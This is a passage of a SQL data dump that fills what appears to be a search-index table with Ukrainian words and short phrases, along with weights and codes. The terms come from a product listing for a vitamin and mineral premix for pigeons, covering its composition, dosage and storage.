3',0,1,1.7,'з000',1,'*'),(1540288,'зерносуміші','зерносуміші',0,0,0.7333,'з000',1,'*'),(1540289,'зерносуміші протягом','зерносуміші протягом',0,1,1.6667,'з000',1,'*'),(1540290,'зерносуміші протягом періоду','зерносуміші протягом періоду',0,1,1.9333,'з000',1,'*'),(1540291,'змагань','змагань',0,0,0.4667,'з000',1,'*'),(1540292,'змагань 2','змагань 2',0,1,1.3,'з000',1,'*'),(1540293,'змагань 2 рази','змагань 2 рази',0,1,1.4667,'з000',1,'*'),(1540294,'його','його',0,0,0.2667,'й000',8,'*'),(1540295,'його в','його в',0,1,1.2,'й000',1,'*'),(1540296,'його в сухому','його в сухому',0,1,1.4333,'й000',1,'*'),(1540297,'йод','йод',0,0,0.2,'й000',1,'*'),(1540298,'йод 25','йод 25',0,1,1.2,'й000',1,'*'),(1540299,'йод 25 мг','йод 25 мг',0,1,1.3,'й000',1,'*'),(1540300,'к3','к3',0,0,0.1333,'к000',2,'*'),(1540301,'к3 50','к3 50',0,1,1.1667,'к000',1,'*'),(1540302,'к3 50 мг','к3 50 мг',0,1,1.2667,'к000',1,'*'),(1540303,'кісткової','кісткової',0,0,0.6,'к000',1,'*'),(1540304,'кісткової системи','кісткової системи',0,1,1.5667,'к000',1,'*'),(1540305,'кісткової системи та','кісткової системи та',0,1,1.6667,'к000',1,'*'),(1540306,'кальпан','кальпан',0,0,0.4667,'к000',1,'*'),(1540307,'кальпан 520','кальпан 520',0,1,1.3667,'к000',1,'*'),(1540308,'кальпан 520 мг','кальпан 520 мг',0,1,1.4667,'к000',1,'*'),(1540309,'кальцій','кальцій',0,0,0.4667,'к000',1,'*'),(1540310,'кальцій 32,00','кальцій 32,00',0,1,1.4333,'к000',1,'*'),(1540311,'кальцій 32,00 фосфор','кальцій 32,00 фосфор',0,1,1.6667,'к000',1,'*'),(1540312,'кг','кг',0,0,0.1333,'к000',5,'*'),(1540313,'кг зерносуміші','кг зерносуміші',0,1,1.4667,'к000',1,'*'),(1540314,'кг зерносуміші протягом','кг зерносуміші протягом',0,1,1.7667,'к000',1,'*'),(1540315,'кг преміксу','кг преміксу',0,1,1.3667,'к000',1,'*'),(1540316,'кг преміксу містить','кг преміксу містить',0,1,1.6333,'к000',1,'*'),(1540317,'кислота','кислота',0,0,0.4667,'к000',2,'*'),(1540318,'кислота 200','кислота 200',0,1,1.3667,'к000',1,'*'),(1540319,'кислота 200 мг','кислота 200 мг',0,1,1.4667,'к000',1,'*'),(1540320,'кислота 40','кислота 40',0,1,1.3333,'к000',1,'*'),(1540321,'кислота 40 мг','кислота 40 мг',0,1,1.4333,'к000',1,'*'),(1540322,'кобальт','кобальт',0,0,0.4667,'к000',1,'*'),(1540323,'кобальт 40','кобальт 40',0,1,1.3333,'к000',1,'*'),(1540324,'кобальт 40 мг','кобальт 40 мг',0,1,1.4333,'к000',1,'*'),(1540325,'комплекс','комплекс',0,0,0.5333,'к000',2,'*'),(1540326,'комплекс життєво','комплекс життєво',0,1,1.5333,'к000',1,'*'),(1540327,'комплекс життєво необхідних','комплекс життєво необхідних',0,1,1.9,'к000',1,'*'),(1540328,'компоненти','компоненти',0,0,0.6667,'к000',1,'*'),(1540329,'компоненти преміксу','компоненти преміксу',0,1,1.6333,'к000',1,'*'),(1540330,'компоненти преміксу сприяють','компоненти преміксу сприяють',0,1,1.9333,'к000',1,'*'),(1540331,'короткодзьобих','короткодзьобих',0,0,0.9333,'к000',1,'*'),(1540332,'короткодзьобих високольотних','короткодзьобих високольотних',0,1,1.9333,'к000',1,'*'),(1540333,'короткодзьобих високольотних та','короткодзьобих високольотних та',0,1,2,'к000',1,'*'),(1540334,'кращому','кращому',0,0,0.4667,'к000',1,'*'),(1540335,'кращому засвоєнню','кращому засвоєнню',0,1,1.5667,'к000',1,'*'),(1540336,'кращому засвоєнню поживних','кращому засвоєнню поживних',0,1,1.8667,'к000',1,'*'),(1540337,'лікарська','лікарська',0,0,0.6,'л000',1,'*'),(1540338,'лікарська форма','лікарська форма',0,1,1.5,'л000',1,'*'),(1540339,'лікарська форма випуску','лікарська форма випуску',0,1,1.7667,'л000',1,'*'),(1540340,'ламінованого','ламінованого',0,0,0.8,'л000',1,'*'),(1540341,'ламінованого паперу','ламінованого паперу',0,1,1.6333,'л000',1,'*'),(1540342,'ламінованого паперу та','ламінованого паперу та',0,1,1.7333,'л000',1,'*'),(1540343,'линьки','линьки',0,0,0.4,'л000',2,'*'),(1540344,'линьки збагачену','линьки збагачену',0,1,1.5333,'л000',1,'*'),(1540345,'линьки збагачену зерносуміш','линьки збагачену зерносуміш',0,1,1.9,'л000',1,'*'),(1540346,'ложки','ложки',0,0,0.3333,'л000',1,'*'),(1540347,'ложки преміксу','ложки преміксу',0,1,1.4667,'л000',1,'*'),(1540348,'ложки преміксу на','ложки преміксу на',0,1,1.5667,'л000',1,'*'),(1540349,'мідь','мідь',0,0,0.2667,'м000',1,'*'),(1540350,'мідь 100','мідь 100',0,1,1.2667,'м000',1,'*'),(1540351,'мідь 100 мг','мідь 100 мг',0,1,1.3667,'м000',1,'*'),(1540352,'мікро','мікро',0,0,0.3333,'м000',1,'*'),(1540353,'мікро та','мікро та',0,1,1.2667,'м000',1,'*'),(1540354,'мікро та макроелементів','мікро та макроелементів',0,1,1.7667,'м000',1,'*'),(1540355,'місці','місці',0,0,0.3333,'м000',4,'*'),(1540356,'місці при','місці при',0,1,1.3,'м000',3,'*'),(1540357,'місці при температурі','місці при температурі',0,1,1.7,'м000',3,'*'),(1540358,'місяців з','місяців з',0,1,1.3,'м000',2,'*'),(1540359,'місяців з дня','місяців з дня',0,1,1.4333,'м000',2,'*'),(1540360,'має','має',0,0,0.2,'м000',3,'*'),(1540361,'має зберiгання','має зберiгання',0,1,1.4667,'м000',1,'*'),(1540362,'має зберiгання в','має зберiгання в',0,1,1.5333,'м000',1,'*'),(1540363,'макроелементів','макроелементів',0,0,0.9333,'м000',1,'*'),(1540364,'макроелементів у','макроелементів у',0,1,1.5333,'м000',1,'*'),(1540365,'макроелементів у фізіологічно','макроелементів у фізіологічно',0,1,1.9667,'м000',1,'*'),(1540366,'марганець','марганець',0,0,0.6,'м000',1,'*'),(1540367,'марганець 1200','марганець 1200',0,1,1.4667,'м000',1,'*'),(1540368,'марганець 1200 мг','марганець 1200 мг',0,1,1.5667,'м000',1,'*'),(1540369,'мг біотин','мг біотин',0,1,1.3,'м000',1,'*'),(1540370,'мг біотин 4','мг біотин 4',0,1,1.3667,'м000',1,'*'),(1540371,'мг бетафін','мг бетафін',0,1,1.3333,'м000',1,'*'),(1540372,'мг бетафін 2000','мг бетафін 2000',0,1,1.5,'м000',1,'*'),(1540373,'мг вітамін','мг вітамін',0,1,1.3333,'м000',2,'*'),(1540374,'мг вітамін в1','мг вітамін в1',0,1,1.4333,'м000',2,'*'),(1540375,'мг вітамін в12','мг вітамін в12',0,1,1.4667,'м000',2,'*'),(1540376,'мг вітамін в2','мг вітамін в2',0,1,1.4333,'м000',2,'*'),(1540377,'мг вітамін в6','мг вітамін в6',0,1,1.4333,'м000',2,'*'),(1540378,'мг вітамін к3','мг вітамін к3',0,1,1.4333,'м000',2,'*'),(1540379,'мг вітамін с','мг вітамін с',0,1,1.4,'м000',2,'*'),(1540380,'мг залізо','мг залізо',0,1,1.3,'м000',1,'*'),(1540381,'мг залізо 4000','мг залізо 4000',0,1,1.4667,'м000',1,'*'),(1540382,'мг йод','мг йод',0,1,1.2,'м000',1,'*'),(1540383,'мг йод 25','мг йод 25',0,1,1.3,'м000',1,'*'),(1540384,'мг кальпан','мг кальпан',0,1,1.3333,'м000',1,'*'),(1540385,'мг кальпан 520','мг кальпан 520',0,1,1.4667,'м000',1,'*'),(1540386,'мг кальцій','мг кальцій',0,1,1.3333,'м000',1,'*'),(1540387,'мг кальцій 32,00','мг кальцій 32,00',0,1,1.5333,'м000',1,'*'),(1540388,'мг кобальт','мг кобальт',0,1,1.3333,'м000',1,'*'),(1540389,'мг кобальт 40','мг кобальт 40',0,1,1.4333,'м000',1,'*'),(1540390,'мг мідь','мг мідь',0,1,1.2333,'м000',1,'*'),(1540391,'мг мідь 100','мг мідь 100',0,1,1.3667,'м000',1,'*'),(1540392,'мг марганець','мг марганець',0,1,1.4,'м000',1,'*'),(1540393,'мг марганець 1200','мг марганець 1200',0,1,1.5667,'м000',1,'*'),(1540394,'мг нікотинова','мг нікотинова',0,1,1.4333,'м000',1,'*'),(1540395,'мг нікотинова кислота','мг нікотинова кислота',0,1,1.7,'м000',1,'*'),(1540396,'мг сірка','мг сірка',0,1,1.2667,'м000',1,'*'),(1540397,'мг сірка 1200','мг сірка 1200',0,1,1.4333,'м000',1,'*'),(1540398,'мг фолієва','мг фолієва',0,1,1.3333,'м000',1,'*'),(1540399,'мг фолієва кислота','мг фолієва кислота',0,1,1.6,'м000',1,'*'),(1540400,'мг цинк','мг цинк',0,1,1.2333,'м000',1,'*'),(1540401,'мг цинк 800','мг цинк 800',0,1,1.3667,'м000',1,'*'),(1540402,'медицині виробник продукту','медицині виробник продукту',0,1,1.8667,'м000',1,'*'),(1540403,'молодняка','молодняка',0,0,0.6,'м000',2,'*'),(1540404,'молодняка голубів','молодняка голубів',0,1,1.5667,'м000',1,'*'),(1540405,'молодняка голубів формуванню','молодняка голубів формуванню',0,1,1.9333,'м000',1,'*'),(1540406,'нікотинова','нікотинова',0,0,0.6667,'н000',2,'*'),(1540407,'нікотинова кислота','нікотинова кислота',0,1,1.6,'н000',2,'*'),(1540408,'нікотинова кислота 200','нікотинова кислота 200',0,1,1.7333,'н000',1,'*'),(1540409,'на 1 кг','на 1 кг',0,1,1.2333,'н000',2,'*'),(1540410,'на тиждень','на тиждень',0,1,1.3333,'н000',1,'*'),(1540411,'на тиждень а','на тиждень а',0,1,1.4,'н000',1,'*'),(1540412,'на тиждень протипоказання','на тиждень протипоказання',0,1,1.8333,'н000',1,'*'),(1540413,'найважливішими','найважливішими',0,0,0.9333,'н000',1,'*'),(1540414,'найважливішими показниками','найважливішими показниками',0,1,1.8667,'н000',1,'*'),(1540415,'найважливішими показниками нормалізації','найважливішими показниками нормалізації',0,1,2,'н000',1,'*'),(1540416,'не має','не має',0,1,1.2,'н000',1,'*'),(1540417,'не має зберiгання','не має зберiгання',0,1,1.5667,'н000',1,'*'),(1540418,'невелику','невелику',0,0,0.5333,'н000',1,'*'),(1540419,'невелику ємність','невелику ємність',0,1,1.5333,'н000',1,'*'),(1540420,'невелику ємність годівницю','невелику ємність годівницю',0,1,1.8667,'н000',1,'*'),(1540421,'необхідних','необхідних',0,0,0.6667,'н000',1,'*'),(1540422,'необхідних вітамінів','необхідних вітамінів',0,1,1.6667,'н000',1,'*'),(1540423,'необхідних вітамінів мікро','необхідних вітамінів мікро',0,1,1.8667,'н000',1,'*'),(1540424,'нормалізації','нормалізації',0,0,0.8,'н000',1,'*'),(1540425,'нормалізації обміну','нормалізації обміну',0,1,1.6333,'н000',1,'*'),(1540426,'нормалізації обміну речовин','нормалізації обміну речовин',0,1,1.9,'н000',1,'*'),(1540427,'обміну','обміну',0,0,0.4,'о000',1,'*'),(1540428,'обміну речовин','обміну речовин',0,1,1.4667,'о000',1,'*'),(1540429,'обміну речовин осиленню','обміну речовин осиленню',0,1,1.7667,'о000',1,'*'),(1540430,'обміну речовин посиленню','обміну речовин посиленню',0,1,1.8,'о000',1,'*'),(1540431,'од','од',0,0,0.1333,'о000',2,'*'),(1540432,'од вітамін','од вітамін',0,1,1.3333,'о000',2,'*'),(1540433,'од вітамін д3','од вітамін д3',0,1,1.4333,'о000',2,'*'),(1540434,'од вітамін е','од вітамін е',0,1,1.4,'о000',2,'*'),(1540435,'однорідна','однорідна',0,0,0.6,'о000',1,'*'),(1540436,'однорідна сипуча','однорідна сипуча',0,1,1.5333,'о000',1,'*'),(1540437,'однорідна сипуча суміш','однорідна сипуча суміш',0,1,1.7333,'о000',1,'*'),(1540438,'ознак','ознак',0,0,0.3333,'о000',2,'*'),(1540439,'ознак та','ознак та',0,1,1.2667,'о000',1,'*'),(1540440,'ознак та запаху','ознак та запаху',0,1,1.5,'о000',1,'*'),(1540441,'опис однорідна','опис однорідна',0,1,1.4667,'о000',1,'*'),(1540442,'опис однорідна сипуча','опис однорідна сипуча',0,1,1.7,'о000',1,'*'),(1540443,'оптимальному','оптимальному',0,0,0.8,'о000',1,'*'),(1540444,'оптимальному співвідношенні','оптимальному співвідношенні',0,1,1.9,'о000',1,'*'),(1540445,'оптимальному співвідношенні компоненти','оптимальному співвідношенні компоненти',0,1,2,'о000',1,'*'),(1540446,'осиленню','осиленню',0,0,0.5333,'о000',1,'*'),(1540447,'осиленню життєздатності','осиленню життєздатності',0,1,1.7667,'о000',1,'*'),(1540448,'осиленню життєздатності молодняка','осиленню життєздатності молодняка',0,1,2,'о000',1,'*'),(1540449,'оштово-спортивних','оштово-спортивних',0,0,1,'о000',1,'*'),(1540450,'оштово-спортивних статних','оштово-спортивних статних',0,1,1.8333,'о000',1,'*'),(1540451,'оштово-спортивних статних ігрових','оштово-спортивних статних ігрових',0,1,2,'о000',1,'*'),(1540452,'підвищенню','підвищенню',0,0,0.6667,'п000',1,'*'),(1540453,'підвищенню стійкості','підвищенню стійкості',0,1,1.6667,'п000',1,'*'),(1540454,'підвищенню стійкості до','підвищенню стійкості до',0,1,1.7667,'п000',1,'*'),(1540455,'пір\'яного','пір',0,0,0.6,'п000',2,'*'),(1540456,'пір\'яного покриву','пір покриву',0,1,1.5667,'п000',2,'*'),(1540457,'пір\'яного покриву бренд','пір покриву бренд',0,1,1.7667,'п000',1,'*'),(1540458,'пір\'яного покриву застосування','пір покриву застосування',0,1,2,'п000',1,'*'),(1540459,'пакети з','пакети з',0,1,1.2667,'п000',1,'*'),(1540460,'пакети з ламінованого','пакети з ламінованого',0,1,1.7,'п000',1,'*'),(1540461,'паперу','паперу',0,0,0.4,'п000',2,'*'),(1540462,'паперу та','паперу та',0,1,1.3,'п000',1,'*'),(1540463,'паперу та плівки','паперу та плівки',0,1,1.5333,'п000',1,'*'),(1540464,'період','період',0,0,0.4,'п000',4,'*'),(1540465,'період змагань','період змагань',0,1,1.4667,'п000',1,'*'),(1540466,'період змагань 2','період змагань 2',0,1,1.5333,'п000',1,'*'),(1540467,'періоду','періоду',0,0,0.4667,'п000',1,'*'),(1540468,'періоду розведення','періоду розведення',0,1,1.6,'п000',1,'*'),(1540469,'періоду розведення і','періоду розведення і',0,1,1.6667,'п000',1,'*'),(1540470,'плівки','плівки',0,0,0.4,'п000',1,'*'),(1540471,'плівки поліетиленової','плівки поліетиленової',0,1,1.7,'п000',1,'*'),(1540472,'плівки поліетиленової по','плівки поліетиленової по',0,1,1.8,'п000',1,'*'),(1540473,'плісняви','плісняви',0,0,0.5333,'п000',1,'*'),(1540474,'плісняви склад','плісняви склад',0,1,1.4667,'п000',1,'*'),(1540475,'плісняви склад 1','плісняви склад 1',0,1,1.5333,'п000',1,'*'),(1540476,'по 200','по 200',0,1,1.2,'п000',1,'*'),(1540477,'по 200 1000','по 200 1000',0,1,1.3667,'п000',1,'*'),(1540478,'поживних','поживних',0,0,0.5333,'п000',1,'*'),(1540479,'поживних речовин','поживних речовин',0,1,1.5333,'п000',1,'*'),(1540480,'поживних речовин і','поживних речовин і',0,1,1.6,'п000',1,'*'),(1540481,'показниками','показниками',0,0,0.7333,'п000',2,'*'),(1540482,'показниками нормалізації','показниками нормалізації',0,1,1.8,'п000',1,'*'),(1540483,'показниками нормалізації обміну','показниками нормалізації обміну',0,1,2,'п000',1,'*'),(1540484,'покращенню','покращенню',0,0,0.6667,'п000',1,'*'),(1540485,'покращенню пір\'яного','покращенню пір',0,1,1.6667,'п000',1,'*'),(1540486,'покращенню пір\'яного покриву','покращенню пір покриву',0,1,1.9333,'п000',1,'*'),(1540487,'покриву','покриву',0,0,0.4667,'п000',2,'*'),(1540488,'покриву бренд','покриву бренд',0,1,1.4333,'п000',1,'*'),(1540489,'покриву бренд ппф','покриву бренд ппф',0,1,1.5667,'п000',1,'*'),(1540490,'покриву застосування','покриву застосування',0,1,1.6667,'п000',1,'*'),(1540491,'покриву застосування рекомендовано','покриву застосування рекомендовано',0,1,2,'п000',1,'*'),(1540492,'поліетиленової','поліетиленової',0,0,0.9333,'п000',1,'*'),(1540493,'поліетиленової по','поліетиленової по',0,1,1.5667,'п000',1,'*'),(1540494,'поліетиленової по 200','поліетиленової по 200',0,1,1.7,'п000',1,'*'),(1540495,'порід','порід',0,0,0.3333,'п000',1,'*'),(1540496,'порід голубів','порід голубів',0,1,1.4333,'п000',1,'*'),(1540497,'порід голубів дозування','порід голубів дозування',0,1,1.7667,'п000',1,'*'),(1540498,'порошок опис','порошок опис',0,1,1.4,'п000',1,'*'),(1540499,'порошок опис однорідна','порошок опис однорідна',0,1,1.7333,'п000',1,'*'),(1540500,'посиленню','посиленню',0,0,0.6,'п000',1,'*'),(1540501,'посиленню життєздатності','посиленню життєздатності',0,1,1.8,'п000',1,'*'),(1540502,'посиленню життєздатності молодняка','посиленню життєздатності молодняка',0,1,2,'п000',1,'*'),(1540503,'ппф','ппф',0,0,0.2,'п000',1,'*'),(1540504,'ппф фарматон','ппф фарматон',0,1,1.4,'п000',1,'*'),(1540505,'ппф фарматон лікарська','ппф фарматон лікарська',0,1,1.7333,'п000',1,'*'),(1540506,'премікс','премікс',0,0,0.4667,'п000',1,'*'),(1540507,'премікс для','премікс для',0,1,1.3667,'п000',1,'*'),(1540508,'премікс для голубів','премікс для голубів',0,1,1.6333,'п000',1,'*'),(1540509,'преміксу','преміксу',0,0,0.5333,'п000',1,'*'),(1540510,'преміксу містить','преміксу містить',0,1,1.5333,'п000',1,'*'),(1540511,'преміксу на','преміксу на',0,1,1.3667,'п000',1,'*'),(1540512,'преміксу на 1','преміксу на 1',0,1,1.4333,'п000',1,'*'),(1540513,'преміксу сприяють','преміксу сприяють',0,1,1.5667,'п000',1,'*'),(1540514,'преміксу сприяють підвищенню','преміксу сприяють підвищенню',0,1,1.9333,'п000',1,'*'),(1540515,'преміксу та','преміксу та',0,1,1.3667,'п000',1,'*'),(1540516,'преміксу та утримувати','преміксу та утримувати',0,1,1.7333,'п000',1,'*'),(1540517,'при','при',0,0,0.2,'п000',10,'*'),(1540518,'при температурі','при температурі',0,1,1.5,'п000',3,'*'),(1540519,'при температурі від','при температурі від',0,1,1.6333,'п000',2,'*'),(1540520,'придатності 12','придатності 12',0,1,1.4667,'п000',2,'*'),(1540521,'придатності 12 місяців','придатності 12 місяців',0,1,1.7333,'п000',2,'*'),(1540522,'протипоказання не має','протипоказання не має',0,1,1.7,'п000',1,'*'),(1540523,'протягом періоду','протягом періоду',0,1,1.5333,'п000',1,'*'),(1540524,'протягом періоду розведення','протягом періоду розведення',0,1,1.9,'п000',1,'*'),(1540525,'протягом року','протягом року',0,1,1.4333,'п000',1,'*'),(1540526,'протягом року регулярнопоновлювати','протягом року регулярнопоновлювати',0,1,2,'п000',1,'*'),(1540527,'птахів за','птахів за',0,1,1.3,'п000',1,'*'),(1540528,'птахів за всіма','птахів за всіма',0,1,1.5,'п000',1,'*'),(1540529,'рази','рази',0,0,0.2667,'р000',1,'*'),(1540530,'рази на','рази на',0,1,1.2333,'р000',1,'*'),(1540531,'рази на тиждень','рази на тиждень',0,1,1.5,'р000',1,'*'),(1540532,'регулярнопоновлювати','регулярнопоновлювати',0,0,1,'р000',1,'*'),(1540533,'регулярнопоновлювати запас','регулярнопоновлювати запас',0,1,1.8667,'р000',1,'*'),(1540534,'регулярнопоновлювати запас преміксу','регулярнопоновлювати запас преміксу',0,1,2,'р000',1,'*'),(1540535,'рекомендовано','рекомендовано',0,0,0.8667,'р000',1,'*'),(1540536,'рекомендовано застосовувати','рекомендовано застосовувати',0,1,1.9,'р000',1,'*'),(1540537,'рекомендовано застосовувати для','рекомендовано застосовувати для',0,1,2,'р000',1,'*'),(1540538,'речовин','речовин',0,0,0.4667,'р000',2,'*'),(1540539,'речовин і','речовин і',0,1,1.3,'р000',1,'*'),(1540540,'речовин і розвитку','речовин і розвитку',0,1,1.6,'р000',1,'*'),(1540541,'речовин осиленню','речовин осиленню',0,1,1.5333,'р000',1,'*'),(1540542,'речовин осиленню життєздатності','речовин осиленню життєздатності',0,1,2,'р000',1,'*'),(1540543,'речовин посиленню','речовин посиленню',0,1,1.5667,'р000',1,'*'),(1540544,'речовин посиленню життєздатності','речовин посиленню життєздатності',0,1,2,'р000',1,'*'),(1540545,'розведення','розведення',0,0,0.6667,'р000',1,'*'),(1540546,'розведення і','розведення і',0,1,1.4,'р000',1,'*'),(1540547,'розведення і линьки','розведення і линьки',0,1,1.6333,'р000',1,'*'),(1540548,'розвитку','розвитку',0,0,0.5333,'р000',3,'*'),(1540549,'розвитку птахів','розвитку птахів',0,1,1.5,'р000',1,'*'),(1540550,'розвитку птахів за','розвитку птахів за',0,1,1.6,'р000',1,'*'),(1540551,'року регулярнопоновлювати','року регулярнопоновлювати',0,1,1.8333,'р000',1,'*'),(1540552,'року регулярнопоновлювати запас','року регулярнопоновлювати запас',0,1,2,'р000',1,'*'),(1540553,'с 500','с 500',0,1,1.1667,'с000',1,'*'),(1540554,'с 500 мг','с 500 мг',0,1,1.2667,'с000',1,'*'),(1540555,'с до','с до',0,1,1.1333,'с000',2,'*'),(1540556,'с до 30','с до 30',0,1,1.2333,'с000',1,'*'),(1540557,'с форма','с форма',0,1,1.2333,'с000',1,'*'),(1540558,'с форма випуску','с форма випуску',0,1,1.5,'с000',1,'*'),(1540559,'сірка','сірка',0,0,0.3333,'с000',1,'*'),(1540560,'сірка 1200','сірка 1200',0,1,1.3333,'с000',1,'*'),(1540561,'сірка 1200 мг','сірка 1200 мг',0,1,1.4333,'с000',1,'*'),(1540562,'сипуча','сипуча',0,0,0.4,'с000',1,'*'),(1540563,'сипуча суміш','сипуча суміш',0,1,1.4,'с000',1,'*'),(1540564,'сипуча суміш без','сипуча суміш без',0,1,1.5333,'с000',1,'*'),(1540565,'системи','системи',0,0,0.4667,'с000',2,'*'),(1540566,'системи та','системи та',0,1,1.3333,'с000',1,'*'),(1540567,'системи та покращенню','системи та покращенню',0,1,1.7,'с000',1,'*'),(1540568,'склад 1 кг','склад 1 кг',0,1,1.3333,'с000',2,'*'),(1540569,'співвідношенні','співвідношенні',0,0,0.9333,'с000',2,'*'),(1540570,'співвідношенні компоненти','співвідношенні компоненти',0,1,1.8333,'с000',1,'*'),(1540571,'співвідношенні компоненти преміксу','співвідношенні компоненти преміксу',0,1,2,'с000',1,'*'),(1540572,'сприяють','сприяють',0,0,0.5333,'с000',1,'*'),(1540573,'сприяють підвищенню','сприяють підвищенню',0,1,1.6333,'с000',1,'*'),(1540574,'сприяють підвищенню стійкості','сприяють підвищенню стійкості',0,1,1.9667,'с000',1,'*'),(1540575,'ст','ст',0,0,0.1333,'с000',1,'*'),(1540576,'ст ложки','ст ложки',0,1,1.2667,'с000',1,'*'),(1540577,'ст ложки преміксу','ст ложки преміксу',0,1,1.5667,'с000',1,'*'),(1540578,'стійкості','стійкості',0,0,0.6,'с000',1,'*'),(1540579,'стійкості до','стійкості до',0,1,1.4,'с000',1,'*'),(1540580,'стійкості до хвороб','стійкості до хвороб',0,1,1.6333,'с000',1,'*'),(1540581,'стані','стані',0,0,0.3333,'с000',1,'*'),(1540582,'стані 2','стані 2',0,1,1.2333,'с000',1,'*'),(1540583,'стані 2 варіант','стані 2 варіант',0,1,1.5,'с000',1,'*'),(1540584,'статних','статних',0,0,0.4667,'с000',1,'*'),(1540585,'статних ігрових','статних ігрових',0,1,1.5,'с000',1,'*'),(1540586,'статних ігрових короткодзьобих','статних ігрових короткодзьобих',0,1,2,'с000',1,'*'),(1540587,'суміш','суміш',0,0,0.3333,'с000',2,'*'),(1540588,'суміш без','суміш без',0,1,1.3,'с000',1,'*'),(1540589,'суміш без ознак','суміш без ознак',0,1,1.5,'с000',1,'*'),(1540590,'сухому','сухому',0,0,0.4,'с000',2,'*'),(1540591,'сухому місці','сухому місці',0,1,1.4,'с000',1,'*'),(1540592,'сухому місці при','сухому місці при',0,1,1.5333,'с000',1,'*'),(1540593,'сухому стані','сухому стані',0,1,1.4,'с000',1,'*'),(1540594,'сухому стані 2','сухому стані 2',0,1,1.4667,'с000',1,'*'),(1540595,'та інших','та інших',0,1,1.2667,'т000',2,'*'),(1540596,'та інших порід','та інших порід',0,1,1.4667,'т000',1,'*'),(1540597,'та запаху','та запаху',0,1,1.3,'т000',1,'*'),(1540598,'та запаху плісняви','та запаху плісняви',0,1,1.6,'т000',1,'*'),(1540599,'та макроелементів','та макроелементів',0,1,1.5667,'т000',1,'*'),(1540600,'та макроелементів у','та макроелементів у',0,1,1.6333,'т000',1,'*'),(1540601,'та плівки','та плівки',0,1,1.3,'т000',1,'*'),(1540602,'та плівки поліетиленової','та плівки поліетиленової',0,1,1.8,'т000',1,'*'),(1540603,'та покращенню','та покращенню',0,1,1.4333,'т000',1,'*'),(1540604,'та покращенню пір\'яного','та покращенню пір',0,1,1.7667,'т000',1,'*'),(1540605,'та утримувати','та утримувати',0,1,1.4333,'т000',1,'*'),(1540606,'та утримувати його','та утримувати його',0,1,1.6,'т000',1,'*'),(1540607,'температурі','температурі',0,0,0.7333,'т000',3,'*'),(1540608,'температурі від','температурі від',0,1,1.5,'т000',2,'*'),(1540609,'температурі від 0','температурі від 0',0,1,1.5667,'т000',1,'*'),(1540610,'термін придатності 12','термін придатності 12',0,1,1.7,'т000',2,'*'),(1540611,'тиждень','тиждень',0,0,0.4667,'т000',1,'*'),(1540612,'тиждень а','тиждень а',0,1,1.3,'т000',1,'*'),(1540613,'тиждень а в','тиждень а в',0,1,1.3667,'т000',1,'*'),(1540614,'тиждень протипоказання','тиждень протипоказання',0,1,1.7333,'т000',1,'*'),(1540615,'тиждень протипоказання не','тиждень протипоказання не',0,1,1.8333,'т000',1,'*'),(1540616,'у фізіологічно','у фізіологічно',0,1,1.4667,'у000',1,'*'),(1540617,'у фізіологічно оптимальному','у фізіологічно оптимальному',0,1,1.9,'у000',1,'*'),(1540618,'утримувати','утримувати',0,0,0.6667,'у000',1,'*'),(1540619,'утримувати його','утримувати його',0,1,1.5,'у000',1,'*'),(1540620,'утримувати його в','утримувати його в',0,1,1.5667,'у000',1,'*'),(1540621,'фізіологічно','фізіологічно',0,0,0.8,'ф000',1,'*'),(1540622,'фізіологічно оптимальному','фізіологічно оптимальному',0,1,1.8333,'ф000',1,'*'),(1540623,'фізіологічно оптимальному співвідношенні','фізіологічно оптимальному співвідношенні',0,1,2,'ф000',1,'*'),(1540624,'фарматон','фарматон',0,0,0.5333,'ф000',2,'*'),(1540625,'фарматон лікарська','фарматон лікарська',0,1,1.6,'ф000',1,'*'),(1540626,'фарматон лікарська форма','фарматон лікарська форма',0,1,1.8,'ф000',1,'*'),(1540627,'фолієва','фолієва',0,0,0.4667,'ф000',2,'*'),(1540628,'фолієва кислота','фолієва кислота',0,1,1.5,'ф000',2,'*'),(1540629,'фолієва кислота 40','фолієва кислота 40',0,1,1.6,'ф000',1,'*'),(1540630,'форма випуску пакети','форма випуску пакети',0,1,1.6667,'ф000',2,'*'),(1540631,'форма випуску порошок','форма випуску порошок',0,1,1.7,'ф000',1,'*'),(1540632,'формуванню','формуванню',0,0,0.6667,'ф000',1,'*'),(1540633,'формуванню кісткової','формуванню кісткової',0,1,1.6667,'ф000',1,'*'),(1540634,'формуванню кісткової системи','формуванню кісткової системи',0,1,1.9333,'ф000',1,'*'),(1540635,'фосфор','фосфор',0,0,0.4,'ф000',1,'*'),(1540636,'фосфор 0,35','фосфор 0,35',0,1,1.3667,'ф000',1,'*'),(1540637,'фосфор 0,35 властивостi','фосфор 0,35 властивостi',0,1,1.7667,'ф000',1,'*'),(1540638,'хвороб','хвороб',0,0,0.4,'х000',1,'*'),(1540639,'хвороб кращому','хвороб кращому',0,1,1.4667,'х000',1,'*'),(1540640,'хвороб кращому засвоєнню','хвороб кращому засвоєнню',0,1,1.8,'х000',1,'*'),(1540641,'цинк','цинк',0,0,0.2667,'ц000',1,'*'),(1540642,'цинк 800','цинк 800',0,1,1.2667,'ц000',1,'*'),(1540643,'цинк 800 мг','цинк 800 мг',0,1,1.3667,'ц000',1,'*'),(1546145,'0,4-0,8','0,4-0,8',0,0,0.7,'',1,'*'),(1546146,'0,4-0,8 г','0,4-0,8 г',0,1,1.3,'г000',1,'*'),(1546147,'0,4-0,8 г на','0,4-0,8 г на',0,1,1.4,'г000',1,'*'),(1546148,'0,5-0,8','0,5-0,8',0,0,0.7,'',1,'*'),(1546149,'0,5-0,8 г','0,5-0,8 г',0,1,1.3,'г000',1,'*'),(1546150,'0,5-0,8 г на','0,5-0,8 г на',0,1,1.4,'г000',1,'*'),(1546151,'000 000','000 000',0,1,1.2333,'',1,'*'),(1546152,'000 000 од','000 000 од',0,1,1.3333,'о000',1,'*'),(1546153,'000 мг','000 мг',0,1,1.2,'м000',1,'*'),(1546154,'000 мг вітамін','000 мг вітамін',0,1,1.4667,'м000',1,'*'),(1546155,'1 3','1 3',0,1,1.1,'',1,'*'),(1546156,'1 3 5','1 3 5',0,1,1.1667,'',1,'*'),(1546157,'1 г на','1 г на',0,1,1.2,'г000',1,'*'),(1546158,'1 кг порошка','1 кг порошка',0,1,1.4,'к000',1,'*'),(1546159,'10 000','10 000',0,1,1.2,'',1,'*'),(1546160,'10 000 000','10 000 000',0,1,1.3333,'',1,'*'),(1546161,'10 г','10 г',0,1,1.1333,'г000',2,'*'),(1546162,'10 г та','10 г та',0,1,1.2333,'г000',1,'*'),(1546163,'1000 г зберiгання','1000 г зберiгання',0,1,1.5667,'г000',1,'*'),(1546164,'12 курей','12 